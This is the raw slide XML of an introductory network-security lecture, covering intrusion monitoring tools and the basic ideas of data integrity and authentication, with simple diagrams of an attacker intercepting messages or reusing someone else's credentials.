              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2401"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>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Monitor the operating system for signs of hacking</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2401"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>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Examples: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Snort,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>GFI LANguard</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2401"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>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2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Problem: every threat message requires human analysis</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7143840" y="3643200"/>
            <a:ext cx="2123640" cy="11808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Data integrity</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8457840" cy="4876560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>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u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Data integrity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>- an attacker should not be able to change the transmitted data</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CustomShape 3" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553080" y="6296039"/>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1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:fld id="{0077B2C9-AFBE-4DAF-8F7F-AAA36B5FA150}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CustomShape 4" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2906640" y="4476600"/>
            <a:ext cx="2666519" cy="1523520"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6787"/>
              <a:gd name="adj2" fmla="val 14898"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCC00"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 5" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1428840" y="4629240"/>
            <a:ext cx="715680" cy="990360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 6" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6381720" y="4629240"/>
            <a:ext cx="715680" cy="990360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 7" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4044960" y="3181320"/>
            <a:ext cx="690120" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="CustomShape 5" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2311560" y="4248000"/>
            <a:ext cx="1738080" cy="1020240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1095" h="643" fill="norm" stroke="1" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="633"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="629"/>
                  <a:pt x="327" y="643"/>
                  <a:pt x="472" y="618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="617" y="593"/>
                  <a:pt x="764" y="586"/>
                  <a:pt x="868" y="483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="972" y="380"/>
                  <a:pt x="1048" y="101"/>
                  <a:pt x="1095" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28440" cap="sq">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="CustomShape 6" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5014440" y="3257640"/>
            <a:ext cx="1773845" cy="825156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="8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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>intercepts and</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="8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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>fakes the</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="8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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>messages</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="CustomShape 7" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4737240" y="4216320"/>
            <a:ext cx="1612440" cy="1018800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1016" h="642" fill="norm" stroke="1" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="1016" y="630"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="949" y="628"/>
                  <a:pt x="754" y="642"/>
                  <a:pt x="623" y="618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="492" y="594"/>
                  <a:pt x="331" y="586"/>
                  <a:pt x="227" y="483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="380"/>
                  <a:pt x="47" y="101"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28440" cap="sq">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>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CustomShape 1" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468360" y="115920"/>
            <a:ext cx="7127640" cy="1152000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="450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Authentication/ Authorization</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8457840" cy="4876560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="339840" algn="l"/>
                <a:tab pos="787320" algn="l"/>
                <a:tab pos="1236600" algn="l"/>
                <a:tab pos="1685880" algn="l"/>
                <a:tab pos="2135160" algn="l"/>
                <a:tab pos="2584440" algn="l"/>
                <a:tab pos="3033720" algn="l"/>
                <a:tab pos="3483000" algn="l"/>
                <a:tab pos="3932280" algn="l"/>
                <a:tab pos="4381560" algn="l"/>
                <a:tab pos="4830840" algn="l"/>
                <a:tab pos="5280120" algn="l"/>
                <a:tab pos="5729400" algn="l"/>
                <a:tab pos="6178680" algn="l"/>
                <a:tab pos="6627960" algn="l"/>
                <a:tab pos="7077240" algn="l"/>
                <a:tab pos="7526160" algn="l"/>
                <a:tab pos="7975440" algn="l"/>
                <a:tab pos="8424720" algn="l"/>
                <a:tab pos="8874000" algn="l"/>
                <a:tab pos="9323280" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> - user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>identification</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CustomShape 3" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2133360" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="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fld id="{6F1550D7-F03A-4195-B5D3-520C0B62AE53}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CustomShape 4" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2763720" y="4081320"/>
            <a:ext cx="2666519" cy="1523520"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6787"/>
              <a:gd name="adj2" fmla="val 14898"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCC00"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 5" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1285920" y="4233960"/>
            <a:ext cx="715680" cy="990360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 6" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6238800" y="4233960"/>
            <a:ext cx="715680" cy="990360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 7" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3902040" y="2786040"/>
            <a:ext cx="690120" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="CustomShape 5" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4890600" y="2779559"/>
            <a:ext cx="2541653" cy="581315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="8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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>uses someone else's </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="8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2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>identification data </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="CustomShape 6" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4594320" y="3821040"/>
            <a:ext cx="1612440" cy="1018800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1016" h="642" fill="norm" stroke="1" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="1016" y="630"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="949" y="628"/>
                  <a:pt x="754" y="642"/>
                  <a:pt x="623" y="618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="492" y="594"/>
                  <a:pt x="331" y="586"/>
                  <a:pt x="227" y="483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="380"/>
                  <a:pt x="47" y="101"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28440" cap="sq">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 10" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4467240" y="3500280"/>
            <a:ext cx="533160" cy="48528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FFFF"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="" hidden="0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr isPhoto="0" userDrawn="0"/>
      </p:nvGrpSpPr>
      <p:grpSpPr bwMode="auto">
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextShape 1" hidden="0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468360" y="-14400"/>
            <a:ext cx="7127640" cy="1282320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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lang="ru-RU" sz="3900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Authentication/ Authorization</a:t>
            </a:r>
